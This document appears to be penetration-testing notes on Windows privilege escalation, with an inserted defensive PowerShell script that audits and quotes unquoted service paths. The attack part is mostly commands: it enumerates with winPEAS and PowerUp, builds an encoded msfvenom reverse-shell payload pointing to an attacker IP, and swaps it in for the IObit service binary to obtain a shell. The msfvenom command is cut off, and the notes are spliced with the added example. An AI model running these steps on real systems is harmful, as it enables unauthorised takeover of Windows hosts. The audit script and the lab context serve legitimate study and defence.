Living off the land: GTFOBins for Windows
Enumeration with Winpeas
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe
(the raw URL is needed here; the GitHub blob page would download HTML instead of the binary)
Enumeration with powerup.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Upload the script with Metasploit
upload /root/PowerSploit/Privesc/PowerUp.ps1
Now run the script with PowerShell (the script must be dot-sourced so that its functions are loaded into the session)
load powershell
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
The Iobit AdvancedSystemCareService9 service is vulnerable to path hijack. No quotes are being used to enclose the path.
Unquoted service path vulnerability
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
Now create a reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.3.221 LPORT=4443 -e x86/shikata_ga_nai -
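The finding above is what an administrator should be auditing for and closing before anyone runs PowerUp against the host. The script below is an added example written for these notes, not PowerUp's code or anything from the original page: it enumerates services through Win32_Service, flags every one whose binary path is unquoted and contains a space (the exact condition reported as "path hijack" above), and, if the assumed `-Fix` switch is given, rewrites the service's `ImagePath` registry value with the executable portion quoted. It assumes it is run from an elevated PowerShell prompt on the host being audited.

```powershell
# Audit and remediate unquoted service paths (added example; not from the original notes).
# -Fix is an assumed switch of this script: without it, the script only reports.
param([switch]$Fix)

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $path = $svc.PathName
    if (-not $path) { continue }
    # A path that already starts with a quote is not affected.
    if ($path.StartsWith('"')) { continue }
    # Split the executable (everything up to the first ".exe") from its arguments.
    $m = [regex]::Match($path, '^(.*?\.exe)(\s.*)?$', 'IgnoreCase')
    if (-not $m.Success) { continue }
    $exe  = $m.Groups[1].Value
    $rest = $m.Groups[2].Value
    # Only an executable path that itself contains whitespace can be hijacked:
    # the service controller tries each prefix up to a space as a candidate binary.
    if ($exe -notmatch '\s') { continue }
    [pscustomobject]@{
        Name      = $svc.Name
        StartName = $svc.StartName   # account the service runs as (LocalSystem is the worst case)
        State     = $svc.State
        Exe       = $exe
        Fixed     = '"' + $exe + '"' + $rest
    }
}

if (-not $findings) {
    Write-Host 'No unquoted service paths with spaces found.'
    return
}

$findings | Format-Table -AutoSize

if ($Fix) {
    foreach ($f in $findings) {
        # Win32_Service.PathName mirrors the ImagePath value under the service key;
        # writing the quoted form there is equivalent to "sc config <svc> binPath= ..."
        # but avoids sc.exe's awkward quote escaping. Takes effect at the next service start.
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($f.Name)"
        Write-Host "Quoting $($f.Name): $($f.Fixed)"
        Set-ItemProperty -Path $key -Name ImagePath -Value $f.Fixed
    }
}
```

Run it without arguments first and review the report; a service whose `StartName` is `LocalSystem` and whose parent directories are writable by ordinary users is the combination that turns this finding into a full privilege escalation, so check the directory ACLs of anything reported before deciding how urgently to quote it.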
A reverse Meterpreter payload dies when used here; it has to be chained with post/windows/manage/migrate, which is why a plain shell payload is used.
Now upload the malicious file and drop from Meterpreter to a shell, stop the service, copy the file to the same location, start a listener on port 4443 and start the service again.
upload ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
And we get the reverse shell.
Windows compiled exploits